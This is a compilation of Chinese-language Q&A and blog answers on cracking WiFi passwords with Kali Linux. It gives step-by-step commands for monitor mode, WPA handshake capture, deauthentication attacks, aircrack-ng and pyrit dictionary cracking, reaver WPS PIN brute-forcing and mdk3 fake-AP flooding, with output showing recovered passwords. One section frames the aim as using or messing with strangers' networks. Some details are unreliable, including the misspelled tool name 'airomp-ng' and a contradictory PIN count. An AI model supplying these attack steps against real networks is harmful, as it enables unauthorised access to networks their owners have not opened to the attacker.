A. 怎么用kali linux破wifi
首先在台式机上一定要有一个无线网卡,可以是插在主板上的无线网卡,也可以是USB接口的外置无线网卡,但是最好是Kali Linux支持的型号,不然驱动程序的问题很麻烦,X宝上有的卖。
再说Kali,Kali Linux上破解WIFI的工具非常全面,因为Kali有无线渗透测试的功能,但是系统性的学习还是挺麻烦的,一条条的调用命令破解步骤也比较繁琐,非专业渗透测试人员推荐用一个Kali上面用于无线渗透测试的傻瓜型自动化脚本,那就是wifite。
wifite命令是用于无线渗透测试的自动化测试脚本,它是个python脚本,用于自动化调用kali上面的各种无线测试工具,像是reaver、aircrack-ng等。它会先尝试PIN码破解wifi,当无法用PIN码破解时,会尝试抓取wifi验证握手包,然后用Kali上的字典进行握手包的暴力破解。PIN码破解的时间一般比较短,握手包的暴力破解会用GPU来加速,破解的速度取决于主机的性能配置(还有密码的复杂程度)。
wifite的使用方法:直接在终端输入命令wifite,它会调用aircrack-ng打开网卡的监听模式并扫描附近的无线网络并一一显示出来,等它显示一会儿后按下键盘上的Ctrl+C组合键,它会中断对无线网的扫描并让你选择破解的目标网络,这时输入要破解的网络的序号(注意是序号,是个数字)并按下回车,它就会自动进行破解工作,破解过程可能很长,也可能会失败,等到破解完成会有相应的提示。
B. kail linux 怎么破解无线
首先需要有一台运行kali linux的机器,无论是虚拟机或物理机,一块支持监听模式的无线网卡
root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lo no wireless extensions.
查看无线网卡设备名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airomp-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772 dhclient4415 wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)
进入监听模式
airomp-ng mon0 会列出搜索到的所有无线网络
从中找到你要测试破解的,下来BSSID
root@kali:~/test# airomp-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E4:D3:32:41:56:12 -44 53 171 7 0 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATION PWR Rate Lost Frames Probe E4:D3:32:41:56:12 00:00:00:00:00:00 0 0 - 1 0 18135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -21 1e- 6e 0 7
当看到WPA handshake:说明抓到了握手包,就可以来破解了
如果一直抓不到,可以用如下命令来攻击,强迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one
抓到握手包后,就可以用字典来跑密码了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...
跑的速度如何取决于你机器的性能,更取决于你的字典
如果用物理机,有比较好的显卡,还可以用显卡来加速破解,效率比cpu高的多
kali linux下装显卡驱动,sdk等,参考如下链接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html
我这里用显卡,很快就跑出了密码
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far; 86496 PMKs per second.The password is 'qq123789'.
C. WIFI密码破解姿势总结(1)
WiFi的时代,蹭WiFi成为了一项基本"生存技能"。外出出差时,你想搞点事情,毫无疑问,wifi作为目标是最好的选择。
SSID:服务集标识符,用来标识某一无线局域网的唯一标识
WAP:无线应用协议,利用它可以把网络上的信息传递到无线通信终端
AP:无限访问点或接入点,客户需连接AP才能获得登陆
WEP:802.11定义下的一种加密方式
WPA:常见的无线网络认证之一
Station:站点,网络最基本的组成部门,通常指无线客户端
BSSID:基本服务单元ID,通常显示为接入点的MAC地址
信道:对频段进一步的划分,通信的通道,是信号传输的媒介
信道宽度:例如有20MHZ,40MHZ等,表示一个信道的宽度
抓包:将网络传输发送与接受的数据包进行捕获,重发,编辑等操作
CDLinux
KaliLinux
无线网卡
路由器加密有WEP,WPA/WPA2等加密方式,目前WEP加密方式基本已经没有了,常见都是WPA/WPA2这种加密方式,而我们进行破解,也就是利用字典去撞密码。
打开minidwep-gtk,如果提示如下,需要先设置网卡
插入无线网卡后,连接一下即可
打开后点击扫描
可以看到尾号有wps的,我们可以利用PIN码进行破解
了解:Pin码为8位数的数字组合,一共为11000个,分为前半段4位10000个,后半段3位1000个(最后一位没用),所有只用3位来排列,就只有1000个,一共就是10000+1000=110000。而根据第一位为顺序也并不需要全部走完11000个,当跑pin码时,前面四位成功定位后,进度会自动跳到百分九十,PIN码破解能百分百破解出,所以此方法最省时省力
而后面有MAC地址的这种是指有客户端连接,可以抓取手握包利用字典跑密码
选择wps的利用PIN码破解,点击Reaver
看到数值有变化,就表示可以破解
建议选取稳定的wifi,不然有时候尝试到正确值时,可能因为网络原因,导致失败。
90%此时表示前四位全部正确,下图则得到wifi密码,以及pin码
而如果选择wpa/wpa2,我们直接点击启动
这个时候它就会自己抓取握手包,当抓到握手包会提示
握手包需要对方有大的流量操作,如看电影,如果流量过小,可能抓取不到
最后点击跑字典,选择握手包,再选择字典就开始了
一般几分钟就能跑到密码了。
还是和刚才一样,先插入无线网卡
利用FeedingBottle奶瓶来进行破解,打开后选择YES
选择网卡后,点击Next
点击Scan进行扫描周围wifi
这个画面有点似曾相识,没错,它就时集成了airomp-ng
扫描完成后,我们尽量去选择有用户连接在的wifi,看箭头指示地方
如果目标wifi没有用户连接,我们可以先选择,它会自动等待上线,抓取握手包
继续接着点击Next
点击Start开始,会提示让你选择字典
选择好字典后,则会自动开始,自动抓取握手包,当抓取到后会自动跑字典
下图则得到密码为zeppelin
下一章讲其他两个WIFI破解姿势。
D. 过时的wifi破解工具
之前我们讲过了fluxion和aircrack破解wifi的方法
其实还有很多的wifi破解方式,不妨都试试。知晓每一个工具的优缺点,在合适的情境下去选择最适合的方法
不幸的是下面讲的这些破解方法基本已经成了古董了,只可远观而不可亵玩焉。
因为已经不怎么管用了...
如果想了解wifi历史的人可以继续接着看下去,其他的嘛就快点去看其他文章吧
弄这么多不能用的wifi有什么用呢?之后我们在知道钓鱼wifi的时候会用到,这里我们先讲一下
mdk3 wlan1 b -f FakeAPName.txt -c 2
只需要这么一句话
下面开始我的失败尝试了,愿意看的请留下听我讲述历史...
其实看看也好,可以避免你们继续这样失败的尝试,少浪费一些时间
现在路由器防pin真的是防的很好,我pin了至少30次,只pin出来过机房的很老的一台路由器,其他的总是被pin死,看来这11000次也并不想想象中那样脆弱。这是我做完这次实验的感受
reaver是通过路由器上一个叫做wps的功能来实现攻击的,WPS是许多路由器上都有的一个功能,可以为用户提供简单的配置过程,它与设备中硬编码保存的一个PIN码绑定在一起。Reaver利用的就是PIN码的一个缺陷,最终的结果就是,只要有足够的时间,它就能破解WPA或WPA2的密码。
根据pin码破解的原理,可以看到只需要枚举11000种情况就会必然破解出pin码,从而通过pin得到wifi密码。 具体的为什么是11000种情况呢?
现在开始实现
1.将网卡调到监听模式
打开终端输入 airmon-ng start wlan0
2.扫描开启wps的路由器。
输入 wash -i wlan0mon
WPS Locked为No的就是开启wps服务的路由器,都可以尝试攻击
3.找到了开启WPS的wifi,接下来咱们就可以进行pin码爆破,下面主要说一下reaver的参数。
reaver 命令:
reaver -i mon0 -b mac -S -v
示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv)
应因状况调整参数(-c后面都已目标频道为1作为例子)
选择之前扫描出来的开启WPS的wifi,选择一个进行破解。
输入: reaver -i wlan1 -b 54:E6:FC:35:C5:82 -S -N -vv -c 4
在穷举的过程中,reaver会生成以路由mac地址为名的wpc文件,这个文件在kali系统中/etc/reaver/文件夹下。
一时半会pin不出来,过段时间pin的时候命令加参数 -s file.wpc,就会根据之前的进度继续pin。
最后pin完最后会显示WPS PIN(正确的pin码)和WPA PSK(wifi密码),同时如果WPS功能没关,pin码没修改,无论怎样修改密码,都可以通过pin码获取wifi密码: reaver -i wlan0mon -b mac -p pin 码,来再次得到密码
一般pin的过快,会把路由器pin死,所以 一般还会加上-d5 -t5参数 ,添加5秒延时,当然数值可以自己改。我添加了也照样被pin的死死的。不行了这个软件
很看好他,来试一下
1.打开终端输入wifite
2.我选择了all
3.结果一个也没整出来,他也是用的wps的来破解,现在用wps针对除了很老的路由器,其他的都不是很好办了
图形化界面,大家一看就会懂, 先选择网卡,扫描,破解
说一下主界面的右下角有一个 toolbox工具箱
试试
破解不好用,而且一打开他整个虚拟机都变得有些卡,破解的进度条根本不走
不推荐
我们来试一下他的这些附件
也都不管用,不知道是不是因为使用了https的缘故,反正他现在肯定是out了
参考的一些网站
七夜
freebuf
E. kali linux 怎么破解无线网络密码
首先,虚拟机内是无法使用内置无线网卡的,如果在虚拟机上用kali破解wifi,是需要usb无线网卡的。
在kali里面破解无线网:在终端输入命令wifite,它会打开网卡的监听模式并扫描附近的无线网显示出来,显示一会儿后按下键盘上的ctrl+c组合键,它会让你选择破解的目标网络,这时输入序号(数字),它就会自动进行破解工作,破解完成有提示。
原理:wifite命令是无线渗透测试的自动化脚本,它实际上是个python脚本,用于自动化调用kali上面的各种工具,像是reaver、aircrack-ng等。它先尝试pin码破解,无法用pin码破解时,会尝试抓取握手包,用字典进行握手包的暴力破解。pin码破解的时间比较短,握手包的暴力破解可能会用gpu加速,取决于主机的性能和密码的复杂程度,虚拟机对握手包暴力破解很无力(性能局限),就指望pin码破解了。